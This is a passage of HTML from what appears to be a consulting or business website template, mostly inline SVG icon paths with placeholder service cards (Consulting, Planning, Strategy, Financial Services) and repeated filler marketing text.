		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="107.869" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="148.639" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="189.409" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Consulting</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled </p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M473.492,189.736h-0.001l-22.417-2.651c-2.44-6.903-5.255-13.693-8.412-20.293l13.979-17.731    c13.686-17.358,13.649-40.806-0.084-54.541l-39.083-39.083c-13.734-13.734-37.182-13.771-54.543-0.083l-17.73,13.981    c-6.603-3.159-13.393-5.974-20.294-8.412l-2.651-22.417C319.659,16.554,303.054,0,283.63,0h-55.271    c-19.424,0-36.03,16.555-38.626,38.51l-2.65,22.417c-6.899,2.439-13.684,5.251-20.284,8.408l-17.73-13.981    c-17.359-13.687-40.807-13.653-54.543,0.083L55.444,94.519c-13.734,13.735-13.771,37.183-0.084,54.541l13.979,17.73    c-3.159,6.602-5.974,13.392-8.413,20.293l-22.418,2.651C16.555,192.33,0,208.935,0,228.359v55.271    c0,19.423,16.554,36.029,38.506,38.624l22.417,2.652c2.438,6.902,5.253,13.692,8.411,20.294l-13.981,17.731    c-13.688,17.359-13.652,40.807,0.083,54.542l39.082,39.083c13.733,13.733,37.182,13.771,54.541,0.084l17.73-13.979    c6.603,3.159,13.393,5.974,20.294,8.413l2.65,22.417C192.329,495.445,208.934,512,228.359,512h55.271    c19.424,0,36.029-16.554,38.626-38.507l2.651-22.416c6.906-2.44,13.698-5.255,20.304-8.416l17.73,13.98    c17.359,13.684,40.807,13.65,54.541-0.085l39.082-39.082c13.734-13.734,13.771-37.182,0.083-54.542l-13.981-17.731    c3.158-6.602,5.973-13.392,8.411-20.294l22.416-2.652C495.445,319.658,512,303.053,512,283.63v-55.271    C512,208.935,495.445,192.33,473.492,189.736z M492,283.63c0,9.291-8.966,17.357-20.854,18.763l-28.704,3.396    c-3.897,0.461-7.165,3.16-8.354,6.9c-3.183,10.008-7.246,19.808-12.073,29.128c-1.807,3.487-1.406,7.709,1.026,10.792    l17.904,22.706c7.413,9.403,8.049,21.448,1.479,28.017l-39.082,39.083c-6.57,6.569-18.614,5.934-28.016-1.479l-22.706-17.903    c-3.083-2.431-7.303-2.833-10.792-1.026c-9.325,4.831-19.128,8.895-29.136,12.078c-3.74,1.189-6.439,4.457-6.9,8.355    l-3.396,28.705c-1.407,11.89-9.474,20.856-18.765,20.856H228.36c-9.292,0-17.359-8.967-18.765-20.857l-3.394-28.706    c-0.461-3.897-3.159-7.166-6.899-8.355c-10.006-3.183-19.806-7.246-29.129-12.076c-1.451-0.752-3.029-1.121-4.598-1.121    c-2.204,0-4.392,0.727-6.193,2.149l-22.706,17.902c-9.403,7.414-21.448,8.047-28.016,1.479l-39.082-39.083    c-6.571-6.57-5.935-18.614,1.479-28.016l17.904-22.707c2.431-3.084,2.833-7.306,1.026-10.792    c-4.827-9.319-8.889-19.12-12.073-29.128c-1.189-3.74-4.457-6.439-8.354-6.9l-28.705-3.396C28.966,300.987,20,292.921,20,283.63    v-55.271c0-9.291,8.967-17.358,20.857-18.764l28.706-3.394c3.898-0.461,7.166-3.159,8.355-6.899    c3.183-10.006,7.246-19.807,12.075-29.129c1.807-3.486,1.406-7.708-1.026-10.791l-17.902-22.706    c-7.414-9.402-8.049-21.446-1.479-28.016l39.081-39.083c6.569-6.57,18.615-5.935,28.017,1.48l22.706,17.904    c3.083,2.431,7.304,2.834,10.791,1.027c9.318-4.827,19.115-8.888,29.12-12.071c3.74-1.189,6.438-4.457,6.899-8.355l3.394-28.705    C211.001,28.967,219.067,20,228.359,20h55.271c9.291,0,17.358,8.966,18.764,20.855l3.396,28.705c0.461,3.898,3.16,7.166,6.9,8.355    c10.005,3.181,19.806,7.244,29.128,12.073c3.484,1.807,7.708,1.406,10.792-1.026l22.706-17.904    c9.404-7.412,21.448-8.051,28.017-1.48l39.083,39.082c6.569,6.57,5.933,18.614-1.479,28.016l-17.903,22.707    c-2.431,3.084-2.833,7.305-1.026,10.792c4.827,9.315,8.889,19.115,12.075,29.127c1.189,3.74,4.457,6.439,8.355,6.899l28.706,3.394    h-0.001c11.89,1.406,20.857,9.473,20.857,18.764V283.63z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M255.999,94.28c-89.173,0-161.721,72.548-161.721,161.721c0,35.631,11.362,69.426,32.86,97.729    c20.797,27.382,50.325,47.78,83.142,57.435c5.301,1.56,10.856-1.473,12.416-6.771c1.559-5.298-1.472-10.857-6.771-12.416    C156.078,374.37,114.279,318.454,114.279,256c0-78.145,63.575-141.721,141.721-141.721S397.721,177.855,397.721,256    c0,64.606-43.619,121.026-106.076,137.203c-5.346,1.385-8.558,6.842-7.173,12.188c1.167,4.506,5.226,7.495,9.674,7.495    c0.831,0,1.674-0.104,2.515-0.322C367.94,394.102,417.721,329.72,417.721,256C417.721,166.827,345.172,94.28,255.999,94.28z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M334.324,302.94L266,251.038v-44.663c0-5.523-4.478-10-10-10c-5.522,0-10,4.477-10,10V256    c0,3.126,1.462,6.072,3.952,7.962l72.275,54.903c1.809,1.374,3.933,2.038,6.041,2.038c3.019,0,6.003-1.361,7.97-3.951    C339.579,312.554,338.722,306.281,334.324,302.94z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="256" cy="164.02" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="252.36" cy="407.72" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Planning</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled </p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M489.129,42.371h-32.011V10c0-5.523-4.477-10-10-10s-10,4.477-10,10v38.237l-41.806,41.92    c-42.173-38.385-96.385-59.418-153.76-59.418c-61.083,0-118.511,23.787-161.703,66.979C36.657,140.91,12.87,198.338,12.87,259.421    s23.787,118.511,66.979,161.703c6.719,6.719,13.783,12.967,21.151,18.73l-55.074,55.074c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929l57.452-57.453c36.629,23.742,79.348,36.485,124.031,36.485    c44.901,0,87.818-12.868,124.566-36.833l57.801,57.801c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929    c3.905-3.905,3.906-10.237,0-14.143l-55.467-55.467c7.19-5.656,14.092-11.769,20.661-18.337    c43.192-43.192,66.979-100.62,66.979-161.703c0-34.789-7.614-68.199-22.63-99.303c-2.401-4.974-8.381-7.06-13.353-4.658    c-4.974,2.401-7.059,8.379-4.658,13.353c13.696,28.37,20.641,58.855,20.641,90.608c0,115.068-93.615,208.683-208.683,208.683    S32.867,374.49,32.867,259.421c0-115.068,93.615-208.683,208.683-208.683c52.045,0,101.242,18.958,139.627,53.59l-35.099,35.195    c-28.976-25.325-65.717-39.171-104.527-39.171c-87.711,0-159.069,71.358-159.069,159.069s71.36,159.069,159.071,159.069    s159.069-71.358,159.069-159.069c0-14.146-1.859-28.178-5.527-41.708c-6.436-23.746-18.393-45.726-34.797-64.125l42.276-42.391    c0.013-0.013,0.028-0.024,0.041-0.037c0.012-0.012,0.021-0.025,0.033-0.036l48.621-48.753h37.861c5.523,0,10-4.477,10-10    S494.652,42.371,489.129,42.371z M375.792,222.945c3.206,11.825,4.831,24.097,4.831,36.476    c0,76.683-62.386,139.069-139.069,139.069s-139.069-62.387-139.069-139.069s62.386-139.069,139.069-139.069    c33.479,0,65.202,11.779,90.375,33.362l-41.285,41.397c-13.628-10.428-30.644-16.643-49.09-16.643    c-44.637,0-80.953,36.315-80.953,80.953s36.315,80.953,80.953,80.953s80.953-36.315,80.953-80.953    c0-18.997-6.594-36.473-17.592-50.297l41.232-41.344C360.089,183.686,370.271,202.573,375.792,222.945z M235.828,264.236    c1.952,1.946,4.507,2.919,7.062,2.919c2.563,0,5.127-0.979,7.081-2.938l40.71-40.821c7.426,10.1,11.825,22.556,11.825,36.025    c0,33.609-27.343,60.953-60.953,60.953c-33.61,0-60.953-27.344-60.953-60.953s27.343-60.953,60.953-60.953    c12.935,0,24.933,4.062,34.81,10.961l-40.554,40.664C231.909,254.004,231.917,260.335,235.828,264.236z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="419.22" cy="133.64" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Strategy</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled</p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="87.43" cy="406.69" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="470.4" cy="287.44" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M354.647,212.344h-5.797h-3.761h-5.797c-4.854,0-8.802-3.948-8.802-8.802v-8.931c0.001-4.854,3.949-8.802,8.802-8.802    h17.012c3.939,0,7.145,3.204,7.145,7.144c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10c0-14.743-11.818-26.771-26.479-27.127    v-8.584c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10v8.669c-14.798,1.188-26.479,13.602-26.479,28.7v8.931    c0,15.881,12.921,28.802,28.802,28.802h5.797h3.761h5.797c4.854,0,8.802,3.948,8.802,8.801v8.932c0,4.853-3.948,8.801-8.802,8.801    h-17.012c-3.939,0-7.145-3.204-7.145-7.144c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10c0,14.744,11.819,26.771,26.479,27.127    v8.584c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-8.669c14.798-1.188,26.479-13.601,26.479-28.699v-8.932    C383.449,225.264,370.528,212.344,354.647,212.344z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M499.899,339.009c-4.115-9.319-11.613-16.479-21.112-20.159c-9.499-3.68-19.864-3.442-29.183,0.675    c-0.05,0.021-0.1,0.044-0.148,0.066l-62.989,29.048c-5.016,2.313-7.206,8.254-4.894,13.269c2.313,5.016,8.255,7.205,13.269,4.894    l62.908-29.011c4.415-1.927,9.317-2.03,13.813-0.291c4.518,1.751,8.083,5.155,10.04,9.588c1.958,4.433,2.071,9.361,0.321,13.879    c-1.751,4.519-5.155,8.084-9.588,10.041l-128.9,56.914c-20.326,8.975-43.397,8.453-63.301-1.435l-47.185-23.441    c-25.238-12.539-54.498-13.204-80.277-1.819l-0.6,0.264l-34.973-79.21l48.628-21.47c23.239-10.261,49.169-11.087,73.012-2.332    l94.885,34.845c8.475,3.112,12.992,12.594,10.069,21.135c-2.978,8.704-12.491,13.387-21.205,10.44l-73.375-24.818    c-5.233-1.77-10.907,1.037-12.677,6.269c-1.77,5.232,1.037,10.907,6.269,12.677l73.375,24.818    c3.88,1.313,7.831,1.936,11.721,1.936c15.283,0,29.606-9.62,34.816-24.848c6.413-18.746-3.501-39.553-22.099-46.382    l-94.885-34.845c-6.382-2.344-12.888-4.115-19.454-5.321v-55.277c0-54.504,44.343-98.847,98.847-98.847h36.524    c54.505,0,98.848,44.343,98.848,98.847v26.061c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-26.061    c0-57.721-41.365-105.956-96.008-116.636V72.349l25.267-43.222c1.429-2.443,1.755-5.378,0.897-8.075    c-0.858-2.697-2.817-4.905-5.394-6.076l-30.99-14.08c-2.373-1.078-5.072-1.187-7.523-0.305l-22.995,8.276l-20.396-8.153    c-2.345-0.936-4.956-0.951-7.312-0.044l-32.428,12.511c-2.698,1.041-4.813,3.2-5.801,5.919c-0.986,2.719-0.748,5.731,0.655,8.261    l24.881,44.867v30.038c-55.169,10.258-97.072,58.744-97.072,116.84v53.36c-16.52-0.156-33.022,3.199-48.53,10.046l-48.99,21.63    c-2.806-4.199-6.808-7.445-11.615-9.307c-6.172-2.392-12.907-2.236-18.938,0.427l-63.29,27.733    c-3.637,1.594-5.986,5.188-5.986,9.159V502c0,3.473,1.802,6.697,4.76,8.518c1.603,0.985,3.419,1.482,5.24,1.482    c1.542,0,3.088-0.356,4.509-1.074l122.873-62.071c5.926-2.698,10.477-7.518,12.833-13.6c1.925-4.969,2.199-10.302,0.839-15.352    l0.865-0.382c20.327-8.977,43.401-8.454,63.301,1.435l47.185,23.442c25.239,12.536,54.498,13.199,80.277,1.818l128.9-56.914    c9.319-4.114,16.479-11.612,20.159-21.111C504.252,358.692,504.013,348.328,499.899,339.009z M364.391,100.259h-2.84h-36.524    h-1.775V79.641h41.139V100.259z M301.431,27.704l18.049-6.961l20.275,8.105c2.272,0.908,4.798,0.953,7.099,0.123l22.744-8.187    l17.201,7.815l-18.146,31.04h-49.512L301.431,27.704z M137.868,430.678c-0.158,0.07-0.315,0.145-0.47,0.223L28.831,485.745    v-40.524l28.113-13.805c4.958-2.435,7.003-8.427,4.569-13.384c-2.435-4.958-8.425-7.005-13.384-4.569l-19.299,9.476V338.69    l57.329-25.122c1.575-0.694,2.97-0.352,3.661-0.084c0.689,0.268,1.951,0.951,2.647,2.528l2.292,5.19    c0.001,0.002,0.001,0.004,0.002,0.006c0.001,0.002,0.002,0.004,0.003,0.006l45.546,103.154    C141.377,426.782,140.282,429.612,137.868,430.678z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Support</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled</p>			
        			<a href="#"class="link-details"> Explore More </a>
	        our priorities	        <h3>Investment Banking &  <br>Capital Markets</h3>	    
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Investment Management
				</h6>
								<p>We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.</p>
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Private Credit & Equity
				</h6>
								<p>We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.</p>
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Business Multi Solutions
				</h6>
								<p>Our affinity groups are active networks that complement our inclusive culture, giving members additional connections.</p>
	        what we do	        <h3>Creating Your Startup Business</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
					<a href="#"><img src="https://maxbizz.s3.amazonaws.com/images/features1-about-us.jpg" alt="Accounting &amp; Finance"></a>					
						<h5><a href="#">Accounting & Finance</a></h5>						<p>A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.</p>					
					<a href="#">Explore More</a>				
					<a href="#"><img src="https://maxbizz.s3.amazonaws.com/images/features2-about-us.jpg" alt="Management Skills"></a>					
						<h5><a href="#">Management Skills</a></h5>						<p>A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.</p>					
					<a href="#">Explore More</a>				
					<a href="#"><img src="https://maxbizz.s3.amazonaws.com/images/features3-about-us.jpg" alt="Business Planning"></a>					
						<h5><a href="#">Business Planning</a></h5>						<p>A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.</p>					
					<a href="#">Explore More</a>				
	        our priorities	        <h3>We Champion the  Bold to Achieve the  Extraordinary</h3>	    
			<a href="#">all industries</a>
		        <svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m257.756 273.413c75.381 0 136.707-61.326 136.707-136.707 0-75.38-61.326-136.706-136.707-136.706s-136.707 61.326-136.707 136.706c0 75.381 61.327 136.707 136.707 136.707zm0-258.384c67.093 0 121.677 54.584 121.677 121.677s-54.584 121.678-121.677 121.678-121.678-54.584-121.678-121.678c0-67.092 54.585-121.677 121.678-121.677z"></path><path d="m257.755 235.574c54.516 0 98.868-44.352 98.868-98.867s-44.352-98.867-98.868-98.867c-24.609 0-48.193 9.099-66.407 25.621-3.074 2.789-3.305 7.541-.517 10.615 2.789 3.074 7.542 3.307 10.615.517 15.443-14.009 35.441-21.724 56.309-21.724 46.229 0 83.839 37.61 83.839 83.838s-37.61 83.838-83.839 83.838c-46.228 0-83.837-37.609-83.837-83.838 0-13.96 3.497-27.777 10.114-39.957 1.981-3.647.631-8.209-3.016-10.19-3.646-1.982-8.208-.63-10.19 3.016-7.809 14.375-11.937 30.673-11.937 47.131 0 54.515 44.351 98.867 98.866 98.867z"></path><path d="m254.898 172.111c-11.802-.719-15.044-7.822-15.645-9.491-.86-3.212-3.782-5.58-7.265-5.58-4.158 0-7.529 3.371-7.529 7.53 0 .604.079 1.188.213 1.751l-.003.001c.007.027.021.079.04.144.092.355.201.703.342 1.036 1.39 3.834 6.959 15.729 23.371 18.907v9.999c0 4.15 3.365 7.515 7.515 7.515 4.151 0 7.515-3.364 7.515-7.515v-9.773c7.193-1.252 12.025-4.396 15.046-7.239 5.621-5.29 8.977-13.286 8.977-21.39 0-7.615-2.986-25.655-30.649-28.707-5.48-.605-9.389-2.349-11.62-5.183-1.969-2.503-2.182-5.268-2.182-6.341 0-1.322.363-12.913 12.913-12.913 8.234 0 11.559 5.237 12.184 6.376 1.114 2.766 3.818 4.72 6.982 4.72 4.158 0 7.529-3.371 7.529-7.529 0-1.236-.304-2.4-.832-3.429l.004-.002c-2.118-4.604-8.099-11.807-18.353-14.287v-10.087c0-4.15-3.364-7.515-7.515-7.515-4.15 0-7.515 3.365-7.515 7.515v10.055c-14.832 3.522-20.428 17.361-20.428 27.095 0 10.823 7.119 24.248 27.183 26.462 17.268 1.906 17.268 10.835 17.268 13.769 0 3.117-1.115 7.498-4.247 10.445-2.961 2.787-7.433 4.019-13.299 3.661z"></path><path d="m130.238 347.994c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.047 54.268c-2.054 2.184-2.613 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v27.289c0 4.15 3.365 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-34.804c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.884c-4.15 0-7.515 3.365-7.515 7.515v89.56h-42.526v-24.697c0-4.15-3.365-7.515-7.515-7.515s-7.515 3.365-7.515 7.515v32.212c0 4.15 3.365 7.515 7.515 7.515h57.555c4.15 0 7.515-3.365 7.515-7.515v-89.56h14.754c2.997 0 5.708-1.781 6.898-4.533 1.189-2.751.63-5.947-1.424-8.13z"></path><path d="m263.229 296.294c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.046 54.269c-2.054 2.184-2.614 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v141.259c0 4.15 3.365 7.515 7.515 7.515h57.555c4.151 0 7.515-3.365 7.515-7.515v-141.259h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13zm23.304 51.903c-4.151 0-7.515 3.365-7.515 7.515v141.259h-42.526v-141.26c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.882z"></path><path d="m396.221 248.46c-1.42-1.51-3.401-2.366-5.474-2.366-2.072 0-4.054.856-5.474 2.366l-51.047 54.268c-2.054 2.183-2.614 5.379-1.425 8.13 1.19 2.752 3.9 4.533 6.898 4.533h14.754v45.859c0 4.15 3.364 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-53.373c0-4.15-3.364-7.515-7.515-7.515h-4.883l33.661-35.786 33.66 35.786h-4.883c-4.151 0-7.515 3.365-7.515 7.515v189.094h-42.526v-105.662c0-4.15-3.364-7.515-7.515-7.515s-7.515 3.364-7.515 7.515v113.177c0 4.15 3.364 7.515 7.515 7.515h57.556c4.151 0 7.515-3.365 7.515-7.515v-189.095h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13z"></path><path d="m92.805 139.396c0-4.15-3.365-7.515-7.515-7.515h-44.075c-4.15 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151-.001 7.515-3.365 7.515-7.515z"></path><path d="m95.012 198.37-15.676 6.141c-3.865 1.514-5.77 5.874-4.256 9.738 1.161 2.964 3.997 4.775 6.999 4.775.912 0 1.839-.167 2.739-.52l15.676-6.141c3.865-1.514 5.77-5.874 4.256-9.738-1.515-3.863-5.875-5.769-9.738-4.255z"></path><path d="m79.336 74.279 15.676 6.141c.901.353 1.827.52 2.739.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.256-9.738l-15.676-6.141c-3.866-1.514-8.224.392-9.738 4.256-1.514 3.863.392 8.223 4.256 9.737z"></path><path d="m470.785 131.881h-44.075c-4.151 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151 0 7.515-3.365 7.515-7.515-.001-4.15-3.365-7.515-7.515-7.515z"></path><path d="m411.506 212.365 15.675 6.141c.901.353 1.828.52 2.74.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.255-9.738l-15.675-6.141c-3.868-1.514-8.224.392-9.739 4.256-1.514 3.862.391 8.222 4.255 9.737z"></path><path d="m414.25 80.94c.912 0 1.84-.167 2.74-.52l15.675-6.141c3.864-1.514 5.769-5.874 4.255-9.738-1.515-3.865-5.876-5.768-9.739-4.256l-15.675 6.141c-3.864 1.514-5.769 5.874-4.255 9.738 1.161 2.965 3.997 4.776 6.999 4.776z"></path></g></svg>	        
				<h5><a href="#">Financial Services</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M505.709,159.575L336.462,50.682c-3.379-2.174-7.879-1.196-10.052,2.181c-2.173,3.378-1.197,7.878,2.181,10.052    l166.773,107.301h-38.878L266.64,48.07c-6.463-4.158-14.816-4.157-21.28,0L55.514,170.216H16.636L255.991,16.204l33.899,21.81    c3.379,2.173,7.878,1.197,10.052-2.181c2.173-3.378,1.197-7.878-2.181-10.052l-33.899-21.81c-4.776-3.073-10.947-3.073-15.723,0    L6.291,159.575c-5.15,3.314-7.45,9.488-5.723,15.364c1.727,5.876,7.002,9.824,13.126,9.824h36.684v25.07v21.956    c0,5.789,4.106,10.637,9.558,11.784v12.801c0,6.64,5.402,12.042,12.042,12.042h1v89.112c0,4.017,3.256,7.273,7.273,7.273    c4.017,0,7.273-3.256,7.273-7.273v-96.385c0-4.017-3.256-7.273-7.273-7.273h-5.768v-10.04h51.513v10.038h-5.768    c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.273,7.273,7.273h5.768v10.915H74.483V429.11h5.768    c4.017,0,7.273-3.256,7.273-7.273v-18.59c0-4.017-3.256-7.273-7.273-7.273c-4.017,0-7.273,3.256-7.273,7.273v11.317h-1    c-6.64,0-12.042,5.401-12.042,12.041v12.801c-5.453,1.147-9.558,5.995-9.558,11.784v14.682H24.614    c-8.04,0-14.581,6.541-14.581,14.581v15.299c0,8.04,6.541,14.581,14.581,14.581h462.772c8.04,0,14.581-6.541,14.581-14.581    v-15.299c0-8.04-6.541-14.581-14.581-14.581h-25.764V451.19c0-5.789-4.106-10.637-9.558-11.784v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-21.956v-25.07h36.684c6.124,0,11.399-3.948,13.126-9.824    C513.159,169.063,510.859,162.888,505.709,159.575z M253.23,60.303c1.683-1.083,3.857-1.082,5.54,0l170.833,109.914H82.398    L253.23,60.303z M64.924,184.762h382.151v17.797h-77.902h-70.585h-85.176h-70.585H64.924V184.762z M296.304,439.408v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-14.683H361.9v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682h-56.038v-14.682C305.862,445.403,301.756,440.555,296.304,439.408z     M140.542,439.408v-12.801c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    